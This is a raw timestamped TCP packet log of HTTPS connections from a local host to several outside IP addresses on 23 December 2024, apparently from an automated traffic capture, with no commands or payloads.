                                                                                                                                                                              Dec 23, 2024 08:08:44.093964100 CET44349731104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:44.094130039 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:44.095393896 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:44.095408916 CET44349731104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:44.095639944 CET44349731104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:44.096930027 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:44.097081900 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:44.097105026 CET44349731104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:44.097171068 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:44.139333963 CET44349731104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:45.002336025 CET44349731104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:45.002434969 CET44349731104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:45.002495050 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:45.002612114 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:45.002635002 CET44349731104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:45.208843946 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:45.208909988 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:45.209024906 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:45.209315062 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:45.209330082 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:46.420347929 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:46.420577049 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:46.421744108 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:46.421755075 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:46.421999931 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:46.424268007 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:46.424387932 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:46.424416065 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:46.424511909 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:46.424520016 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:47.398555994 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:47.398662090 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:47.398725033 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:47.399036884 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:47.399070978 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:47.796571016 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:47.796622038 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:47.796736956 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:47.797204018 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:47.797214985 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.010258913 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.010535002 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.011769056 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.011799097 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.012377977 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.015605927 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.015705109 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.015718937 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.789154053 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.789264917 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.789340019 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.789449930 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.789468050 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:50.289248943 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:50.289303064 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:50.289383888 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:50.289756060 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:50.289772987 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.511426926 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.511497974 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.512727976 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.512742043 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.512986898 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.520658016 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.521334887 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.521374941 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.521482944 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.521517992 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.521867990 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.521902084 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.522840023 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.522872925 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523020029 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523041964 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523112059 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523122072 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523191929 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523215055 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523230076 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523236036 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523370028 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523386955 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523406982 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523425102 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523890972 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523926973 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.571326971 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.571500063 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.571523905 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.571541071 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.571547985 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:55.208333015 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:55.208439112 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:55.208507061 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:55.208708048 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:55.208728075 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:55.440680981 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:55.440752029 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:55.440845966 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:55.441217899 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:55.441232920 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:56.654555082 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:56.654674053 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:56.656274080 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:56.656290054 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:56.656572104 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:56.664520979 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:56.664551020 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:56.664633989 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.453447104 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.453552961 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.453607082 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:57.453784943 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:57.453804016 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.453819036 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:57.453824997 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.630039930 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:57.630084991 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.630155087 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:57.630507946 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:57.630518913 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.223306894 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.223387003 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:59.226074934 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:59.226089954 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.226433992 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.227785110 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:59.271332026 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.902856112 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.902937889 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.902983904 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:59.902997971 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.903084993 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.903156042 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:59.903156042 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:59.903181076 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:59.903194904 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.903204918 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:59.903208971 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:00.138204098 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:00.138253927 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:00.138372898 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:00.138705015 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:00.138719082 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:01.563600063 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:01.563689947 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:01.583667040 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:01.583688974 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:01.584794044 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:01.586081028 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:01.627334118 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.027543068 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.078444004 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.082437038 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.082464933 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.082494020 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.082518101 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.082526922 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.082532883 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.082561016 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.082592010 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.082601070 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.082662106 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.082669973 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.125308990 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.255670071 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.255701065 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.255744934 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.255769968 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.255800009 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.255814075 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.255820036 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.255832911 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.255867958 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.255875111 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.297168970 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.304497004 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.304518938 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.304562092 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.304563999 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.304585934 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.304613113 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.304622889 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.304635048 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.304672003 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.309464931 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.309542894 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.309590101 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.309598923 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.359690905 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.414139032 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.414153099 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.414212942 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.414232016 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.444540024 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.444583893 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.444595098 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.444629908 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.444633961 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.444653034 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.444662094 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.444663048 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.470313072 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.470331907 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.470349073 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.470438004 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.470438004 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.470457077 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.496081114 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.496098995 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.496136904 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.496201038 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.496201038 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.496217966 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.496225119 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.547225952 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.614171028 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.614182949 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.614217043 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.614227057 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.614250898 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.614296913 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.614350080 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.614370108 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.633440018 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.633450985 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.633471012 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.633482933 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.633517027 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.633553028 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.633569956 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.651170015 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.651190996 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.651233912 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.651266098 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.651278019 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.651285887 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.669054031 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.669075966 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.669105053 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.669301987 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.669316053 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.688219070 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.688231945 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.688245058 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.688268900 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.688302994 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.688317060 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.688352108 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.706093073 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.706118107 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.706162930 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.706177950 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.706187010 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.706191063 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.706231117 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.723963976 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.723984003 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.724036932 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.724039078 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.724057913 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.724066019 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.724154949 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.804626942 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.804652929 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.804727077 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.804737091 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.804778099 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.804799080 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.804799080 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.818106890 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.818133116 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.818170071 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.818185091 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.818196058 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.830635071 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.830686092 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.830703974 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.830717087 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.830754995 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.832299948 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.832374096 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.842427015 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.842444897 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.842514038 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.842525959 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.842588902 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.843986034 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.853790998 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.853807926 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.853893995 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.853914022 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.860205889 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.860228062 CET4434978052.217.67.100192.168.2.10
